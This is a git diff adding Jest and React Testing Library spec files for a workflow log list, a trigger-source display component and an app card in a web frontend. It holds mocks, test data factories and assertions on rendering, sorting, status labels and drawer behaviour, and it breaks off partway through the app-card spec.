displays: + * - Table of workflow run logs with sortable columns + * - Status indicators (success, failed, stopped, running, partial-succeeded) + * - Trigger display for workflow apps + * - Drawer with run details + * - Loading states + */ + +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowAppLogList from './list' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' +import type { WorkflowAppLogDetail, WorkflowLogsResponse, WorkflowRunDetail } from '@/models/log' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import { APP_PAGE_LIMIT } from '@/config' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock useTimestamp hook +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: (timestamp: number, _format: string) => `formatted-${timestamp}`, + }), +})) + +// Mock useBreakpoints hook +jest.mock('@/hooks/use-breakpoints', () => ({ + __esModule: true, + default: () => 'pc', // Return desktop by default + MediaType: { + mobile: 'mobile', + pc: 'pc', + }, +})) + +// Mock the Run component +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
+ {runDetailUrl} + {tracingListUrl} +
+ ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
{children}
+ ), +})) + +// Mock BlockIcon +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: () =>
BlockIcon
, +})) + +// Mock useTheme +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => { + const { Theme } = require('@/types/app') + return { theme: Theme.light } + }, +})) + +// Mock ahooks +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const createMockWorkflowRun = (overrides: Partial = {}): WorkflowRunDetail => ({ + id: 'run-1', + version: '1.0.0', + status: 'succeeded', + elapsed_time: 1.234, + total_tokens: 100, + total_price: 0.001, + currency: 'USD', + total_steps: 5, + finished_at: Date.now(), + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + ...overrides, +}) + +const createMockWorkflowLog = (overrides: Partial = {}): WorkflowAppLogDetail => ({ + id: 'log-1', + workflow_run: createMockWorkflowRun(), + created_from: 'web-app', + created_by_role: 'account', + created_by_account: { + id: 'account-1', + name: 'Test User', + email: 'test@example.com', + }, + created_at: Date.now(), + ...overrides, +}) + +const createMockLogsResponse = ( + data: WorkflowAppLogDetail[] = [], + total = data.length, +): WorkflowLogsResponse => ({ + data, + has_more: data.length < total, + limit: APP_PAGE_LIMIT, + total, + page: 1, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('WorkflowAppLogList', () => { + const defaultOnRefresh = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading state when logs are undefined', () => { + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render loading state when appDetail is undefined', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + + it('should render table when data is available', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByRole('table')).toBeInTheDocument() + }) + + it('should render all table headers', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.startTime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.status')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.runtime')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.tokens')).toBeInTheDocument() + expect(screen.getByText('appLog.table.header.user')).toBeInTheDocument() + }) + + it('should render trigger column for workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const workflowApp = createMockApp({ mode: 'workflow' as AppModeEnum }) + + render( + , + ) + + expect(screen.getByText('appLog.table.header.triggered_from')).toBeInTheDocument() + }) + + it('should not render trigger column for non-workflow apps', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Status Display Tests + // -------------------------------------------------------------------------- + describe('Status Display', () => { + it('should render success status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'succeeded' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Success')).toBeInTheDocument() + }) + + it('should render failure status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'failed' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Failure')).toBeInTheDocument() + }) + + it('should render stopped status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'stopped' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Stop')).toBeInTheDocument() + }) + + it('should render running status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'running' }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Running')).toBeInTheDocument() + }) + + it('should render partial-succeeded status correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ status: 'partial-succeeded' as WorkflowRunDetail['status'] }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('Partial Success')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // User Info Display Tests + // -------------------------------------------------------------------------- + describe('User Info Display', () => { + it('should display account name when created by account', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: { id: 'acc-1', name: 'John Doe', email: 'john@example.com' }, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('John Doe')).toBeInTheDocument() + }) + + it('should display end user session id when created by end user', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_end_user: { id: 'user-1', type: 'browser', is_anonymous: false, session_id: 'session-abc-123' }, + created_by_account: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('session-abc-123')).toBeInTheDocument() + }) + + it('should display N/A when no user info', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + created_by_account: undefined, + created_by_end_user: undefined, + }), + ]) + + render( + , + ) + + expect(screen.getByText('N/A')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Sorting Tests + // -------------------------------------------------------------------------- + describe('Sorting', () => { + it('should sort logs in descending order by default', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + // First row is header, data rows start from index 1 + // In descending order, newest (3000) should be first + expect(rows.length).toBe(4) // 1 header + 3 data rows + }) + + it('should toggle sort order when clicking on start time header', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + ]) + + render( + , + ) + + // Click on the start time header to toggle sort + const startTimeHeader = screen.getByText('appLog.table.header.startTime') + await user.click(startTimeHeader) + + // Arrow should rotate (indicated by class change) + // The sort icon should have rotate-180 class for ascending + const sortIcon = startTimeHeader.closest('div')?.querySelector('svg') + expect(sortIcon).toBeInTheDocument() + }) + + it('should render sort arrow icon', () => { + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + const { container } = render( + , + ) + + // Check for ArrowDownIcon presence + const sortArrow = container.querySelector('svg.ml-0\\.5') + expect(sortArrow).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Drawer Tests + // -------------------------------------------------------------------------- + describe('Drawer', () => { + it('should open drawer when clicking on a log row', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-123' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + id: 'log-1', + workflow_run: createMockWorkflowRun({ id: 'run-456' }), + }), + ]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) // Click first data row + + const dialog = await screen.findByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should close drawer and call onRefresh when closing', async () => { + const user = userEvent.setup() + const onRefresh = jest.fn() + useAppStore.setState({ appDetail: createMockApp() }) + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Close drawer using Escape key + await user.keyboard('{Escape}') + + await waitFor(() => { + expect(onRefresh).toHaveBeenCalled() + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + }) + + it('should highlight selected row', async () => { + const user = userEvent.setup() + const logs = createMockLogsResponse([createMockWorkflowLog()]) + + render( + , + ) + + const dataRows = screen.getAllByRole('row') + const dataRow = dataRows[1] + + // Before click - no highlight + expect(dataRow).not.toHaveClass('bg-background-default-hover') + + // After click - has highlight (via currentLog state) + await user.click(dataRow) + + // The row should have the selected class + expect(dataRow).toHaveClass('bg-background-default-hover') + }) + }) + + // -------------------------------------------------------------------------- + // Replay Functionality Tests + // -------------------------------------------------------------------------- + describe('Replay Functionality', () => { + it('should allow replay when triggered from app-run', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'run-to-replay', + triggered_from: WorkflowRunTriggeredFrom.APP_RUN, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for app-run triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay/workflow?replayRunId=run-to-replay') + }) + + it('should allow replay when triggered from debugging', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-debug' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'debug-run', + triggered_from: WorkflowRunTriggeredFrom.DEBUGGING, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should be present for debugging triggers + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + expect(replayButton).toBeInTheDocument() + }) + + it('should not show replay for webhook triggers', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-webhook' }) }) + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + id: 'webhook-run', + triggered_from: WorkflowRunTriggeredFrom.WEBHOOK, + }), + }), + ]) + + render( + , + ) + + // Open drawer + const dataRows = screen.getAllByRole('row') + await user.click(dataRows[1]) + await screen.findByRole('dialog') + + // Replay button should not be present for webhook triggers + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Unread Indicator Tests + // -------------------------------------------------------------------------- + describe('Unread Indicator', () => { + it('should show unread indicator for unread logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: undefined, + }), + ]) + + const { container } = render( + , + ) + + // Unread indicator is a small blue dot + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).toBeInTheDocument() + }) + + it('should not show unread indicator for read logs', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + read_at: Date.now(), + }), + ]) + + const { container } = render( + , + ) + + // No unread indicator + const unreadDot = container.querySelector('.bg-util-colors-blue-blue-500') + expect(unreadDot).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Runtime Display Tests + // -------------------------------------------------------------------------- + describe('Runtime Display', () => { + it('should display elapsed time with 3 decimal places', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 1.23456 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('1.235s')).toBeInTheDocument() + }) + + it('should display 0 elapsed time with special styling', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ elapsed_time: 0 }), + }), + ]) + + render( + , + ) + + const zeroTime = screen.getByText('0.000s') + expect(zeroTime).toBeInTheDocument() + expect(zeroTime).toHaveClass('text-text-quaternary') + }) + }) + + // -------------------------------------------------------------------------- + // Token Display Tests + // -------------------------------------------------------------------------- + describe('Token Display', () => { + it('should display total tokens', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ total_tokens: 12345 }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('12345')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Empty State Tests + // -------------------------------------------------------------------------- + describe('Empty State', () => { + it('should render empty table when logs data is empty', () => { + const logs = createMockLogsResponse([]) + + render( + , + ) + + const table = screen.getByRole('table') + expect(table).toBeInTheDocument() + + // Should only have header row + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(1) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle multiple logs correctly', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ id: 'log-1', created_at: 1000 }), + createMockWorkflowLog({ id: 'log-2', created_at: 2000 }), + createMockWorkflowLog({ id: 'log-3', created_at: 3000 }), + ]) + + render( + , + ) + + const rows = screen.getAllByRole('row') + expect(rows).toHaveLength(4) // 1 header + 3 data rows + }) + + it('should handle logs with missing workflow_run data gracefully', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + elapsed_time: 0, + total_tokens: 0, + }), + }), + ]) + + render( + , + ) + + expect(screen.getByText('0.000s')).toBeInTheDocument() + expect(screen.getByText('0')).toBeInTheDocument() + }) + + it('should handle null workflow_run.triggered_from for non-workflow apps', () => { + const logs = createMockLogsResponse([ + createMockWorkflowLog({ + workflow_run: createMockWorkflowRun({ + triggered_from: undefined as any, + }), + }), + ]) + const chatApp = createMockApp({ mode: 'advanced-chat' as AppModeEnum }) + + render( + , + ) + + // Should render without trigger column + expect(screen.queryByText('appLog.table.header.triggered_from')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/workflow-log/trigger-by-display.spec.tsx b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx new file mode 100644 index 0000000000..6e95fc2f35 --- /dev/null +++ b/web/app/components/app/workflow-log/trigger-by-display.spec.tsx @@ -0,0 +1,371 @@ +/** + * TriggerByDisplay Component Tests + * + * Tests the display of workflow trigger sources with appropriate icons and labels. + * Covers all trigger types: app-run, debugging, webhook, schedule, plugin, rag-pipeline. + */ + +import { render, screen } from '@testing-library/react' +import TriggerByDisplay from './trigger-by-display' +import { WorkflowRunTriggeredFrom } from '@/models/log' +import type { TriggerMetadata } from '@/models/log' +import { Theme } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +let mockTheme = Theme.light +jest.mock('@/hooks/use-theme', () => ({ + __esModule: true, + default: () => ({ theme: mockTheme }), +})) + +// Mock BlockIcon as it has complex dependencies +jest.mock('@/app/components/workflow/block-icon', () => ({ + __esModule: true, + default: ({ type, toolIcon }: { type: string; toolIcon?: string }) => ( +
+ BlockIcon +
+ ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createTriggerMetadata = (overrides: Partial = {}): TriggerMetadata => ({ + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('TriggerByDisplay', () => { + beforeEach(() => { + jest.clearAllMocks() + mockTheme = Theme.light + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render icon container', () => { + const { container } = render( + , + ) + + // Should have icon container with flex layout + const iconContainer = container.querySelector('.flex.items-center.justify-center') + expect(iconContainer).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should apply custom className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('custom-class') + }) + + it('should show text by default (showText defaults to true)', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should hide text when showText is false', () => { + render( + , + ) + + expect(screen.queryByText('appLog.triggerBy.appRun')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Trigger Type Display Tests + // -------------------------------------------------------------------------- + describe('Trigger Types', () => { + it('should display app-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should display debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.debugging')).toBeInTheDocument() + }) + + it('should display webhook trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.webhook')).toBeInTheDocument() + }) + + it('should display schedule trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.schedule')).toBeInTheDocument() + }) + + it('should display plugin trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should display rag-pipeline-run trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineRun')).toBeInTheDocument() + }) + + it('should display rag-pipeline-debugging trigger correctly', () => { + render() + + expect(screen.getByText('appLog.triggerBy.ragPipelineDebugging')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Plugin Metadata Tests + // -------------------------------------------------------------------------- + describe('Plugin Metadata', () => { + it('should display custom event name from plugin metadata', () => { + const metadata = createTriggerMetadata({ event_name: 'Custom Plugin Event' }) + + render( + , + ) + + expect(screen.getByText('Custom Plugin Event')).toBeInTheDocument() + }) + + it('should fallback to default plugin text when no event_name', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should use plugin icon from metadata in light theme', () => { + mockTheme = Theme.light + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use dark plugin icon in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png', icon_dark: 'dark-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'dark-icon.png') + }) + + it('should fallback to light icon when dark icon not available in dark theme', () => { + mockTheme = Theme.dark + const metadata = createTriggerMetadata({ icon: 'light-icon.png' }) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', 'light-icon.png') + }) + + it('should use default BlockIcon when plugin has no icon metadata', () => { + const metadata = createTriggerMetadata({}) + + render( + , + ) + + const blockIcon = screen.getByTestId('block-icon') + expect(blockIcon).toHaveAttribute('data-tool-icon', '') + }) + }) + + // -------------------------------------------------------------------------- + // Icon Rendering Tests + // -------------------------------------------------------------------------- + describe('Icon Rendering', () => { + it('should render WindowCursor icon for app-run trigger', () => { + const { container } = render( + , + ) + + // Check for the blue brand background used for app-run icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-brand-blue-brand-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Code icon for debugging trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for debugging icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render WebhookLine icon for webhook trigger', () => { + const { container } = render( + , + ) + + // Check for the blue background used for webhook icon + const iconWrapper = container.querySelector('.bg-util-colors-blue-blue-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render Schedule icon for schedule trigger', () => { + const { container } = render( + , + ) + + // Check for the violet background used for schedule icon + const iconWrapper = container.querySelector('.bg-util-colors-violet-violet-500') + expect(iconWrapper).toBeInTheDocument() + }) + + it('should render KnowledgeRetrieval icon for rag-pipeline triggers', () => { + const { container } = render( + , + ) + + // Check for the green background used for rag pipeline icon + const iconWrapper = container.querySelector('.bg-util-colors-green-green-500') + expect(iconWrapper).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle unknown trigger type gracefully', () => { + // Test with a type cast to simulate unknown trigger type + render() + + // Should fallback to default (app-run) icon styling + expect(screen.getByText('unknown-type')).toBeInTheDocument() + }) + + it('should handle undefined triggerMetadata', () => { + render( + , + ) + + expect(screen.getByText('appLog.triggerBy.plugin')).toBeInTheDocument() + }) + + it('should handle empty className', () => { + const { container } = render( + , + ) + + const wrapper = container.firstChild as HTMLElement + expect(wrapper).toHaveClass('flex', 'items-center', 'gap-1.5') + }) + + it('should render correctly when both showText is false and metadata is provided', () => { + const metadata = createTriggerMetadata({ event_name: 'Test Event' }) + + render( + , + ) + + // Text should not be visible even with metadata + expect(screen.queryByText('Test Event')).not.toBeInTheDocument() + expect(screen.queryByText('appLog.triggerBy.plugin')).not.toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Theme Switching Tests + // -------------------------------------------------------------------------- + describe('Theme Switching', () => { + it('should render correctly in light theme', () => { + mockTheme = Theme.light + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + + it('should render correctly in dark theme', () => { + mockTheme = Theme.dark + + render() + + expect(screen.getByText('appLog.triggerBy.appRun')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/app-card.spec.tsx b/web/app/components/apps/app-card.spec.tsx new file mode 100644 index 0000000000..40aa66075d --- /dev/null +++ b/web/app/components/apps/app-card.spec.tsx @@ -0,0 +1,1059 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import { AppModeEnum } from '@/types/app' +import { AccessMode } from '@/models/access-control' + +// Mock next/navigation +const mockPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + }), +})) + +// Mock use-context-selector with stable mockNotify reference for tracking calls +// Include createContext for components that use it (like Toast) +const mockNotify = jest.fn() +jest.mock('use-context-selector', () => { + const React = require('react') + return { + createContext: (defaultValue: any) => React.createContext(defaultValue), + useContext: () => ({ + notify: mockNotify, + }), + useContextSelector: (_context: any, selector: any) => selector({ + notify: mockNotify, + }), + } +}) + +// Mock app context +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: true, + }), +})) + +// Mock provider context +const mockOnPlanInfoChanged = jest.fn() +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + onPlanInfoChanged: mockOnPlanInfoChanged, + }), +})) + +// Mock global public store +jest.mock('@/context/global-public-context', () => ({ + useGlobalPublicStore: (selector: (s: any) => any) => selector({ + systemFeatures: { + webapp_auth: { enabled: false }, + branding: { enabled: false }, + }, + }), +})) + +// Mock API services - import for direct manipulation +import * as appsService from '@/service/apps' +import * as workflowService from '@/service/workflow' + +jest.mock('@/service/apps', () => ({ + deleteApp: jest.fn(() => Promise.resolve()), + updateAppInfo: jest.fn(() => Promise.resolve()), + copyApp: jest.fn(() => Promise.resolve({ id: 'new-app-id' })), + exportAppConfig: jest.fn(() => Promise.resolve({ data: 'yaml: content' })), +})) + +jest.mock('@/service/workflow', () => ({ + fetchWorkflowDraft: jest.fn(() => Promise.resolve({ environment_variables: [] })), +})) + +jest.mock('@/service/explore', () => ({ + fetchInstalledAppList: jest.fn(() => Promise.resolve({ installed_apps: [{ id: 'installed-1' }] })), +})) + +jest.mock('@/service/access-control', () => ({ + useGetUserCanAccessApp: () => ({ + data: { result: true }, + isLoading: false, + }), +})) + +// Mock hooks +jest.mock('@/hooks/use-async-window-open', () => ({ + useAsyncWindowOpen: () => jest.fn(), +})) + +// Mock utils +jest.mock('@/utils/app-redirection', () => ({ + getRedirection: jest.fn(), +})) + +jest.mock('@/utils/var', () => ({ + basePath: '', +})) + +jest.mock('@/utils/time', () => ({ + formatTime: () => 'Jan 1, 2024', +})) + +// Mock dynamic imports +jest.mock('next/dynamic', () => { + const React = require('react') + return (importFn: () => Promise) => { + const fnString = importFn.toString() + + if (fnString.includes('create-app-modal') || fnString.includes('explore/create-app-modal')) { + return function MockEditAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'edit-app-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-edit-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Updated App', + icon_type: 'emoji', + icon: '🎯', + icon_background: '#FFEAD5', + description: 'Updated description', + use_icon_as_answer_icon: false, + max_active_requests: null, + }), + 'data-testid': 'confirm-edit-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('duplicate-modal')) { + return function MockDuplicateAppModal({ show, onHide, onConfirm }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'duplicate-modal' }, + React.createElement('button', { 'onClick': onHide, 'data-testid': 'close-duplicate-modal' }, 'Close'), + React.createElement('button', { + 'onClick': () => onConfirm?.({ + name: 'Copied App', + icon_type: 'emoji', + icon: '📋', + icon_background: '#E4FBCC', + }), + 'data-testid': 'confirm-duplicate-modal', + }, 'Confirm'), + ) + } + } + if (fnString.includes('switch-app-modal')) { + return function MockSwitchAppModal({ show, onClose, onSuccess }: any) { + if (!show) return null + return React.createElement('div', { 'data-testid': 'switch-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-switch-modal' }, 'Close'), + React.createElement('button', { 'onClick': onSuccess, 'data-testid': 'confirm-switch-modal' }, 'Switch'), + ) + } + } + if (fnString.includes('base/confirm')) { + return function MockConfirm({ isShow, onCancel, onConfirm }: any) { + if (!isShow) return null + return React.createElement('div', { 'data-testid': 'confirm-dialog' }, + React.createElement('button', { 'onClick': onCancel, 'data-testid': 'cancel-confirm' }, 'Cancel'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-confirm' }, 'Confirm'), + ) + } + } + if (fnString.includes('dsl-export-confirm-modal')) { + return function MockDSLExportModal({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'dsl-export-modal' }, + React.createElement('button', { 'onClick': () => onClose?.(), 'data-testid': 'close-dsl-export' }, 'Close'), + React.createElement('button', { 'onClick': () => onConfirm?.(true), 'data-testid': 'confirm-dsl-export' }, 'Export with secrets'), + React.createElement('button', { 'onClick': () => onConfirm?.(false), 'data-testid': 'confirm-dsl-export-no-secrets' }, 'Export without secrets'), + ) + } + } + if (fnString.includes('app-access-control')) { + return function MockAccessControl({ onClose, onConfirm }: any) { + return React.createElement('div', { 'data-testid': 'access-control-modal' }, + React.createElement('button', { 'onClick': onClose, 'data-testid': 'close-access-control' }, 'Close'), + React.createElement('button', { 'onClick': onConfirm, 'data-testid': 'confirm-access-control' }, 'Confirm'), + ) + } + } + return () => null + } +}) + +/** + * Mock components that require special handling in test environment. + * + * Per frontend testing skills (mocking.md), we should NOT mock simple base components. + * However, the following require mocking due to: + * - Portal-based rendering that doesn't work well in happy-dom + * - Deep dependency chains importing ES modules (like ky) incompatible with Jest + * - Complex state management that requires controlled test behavior + */ + +// Popover uses portals for positioning which requires mocking in happy-dom environment +jest.mock('@/app/components/base/popover', () => { + const MockPopover = ({ htmlContent, btnElement, btnClassName }: any) => { + const [isOpen, setIsOpen] = React.useState(false) + // Call btnClassName to cover lines 430-433 + const computedClassName = typeof btnClassName === 'function' ? btnClassName(isOpen) : '' + return React.createElement('div', { 'data-testid': 'custom-popover', 'className': computedClassName }, + React.createElement('div', { 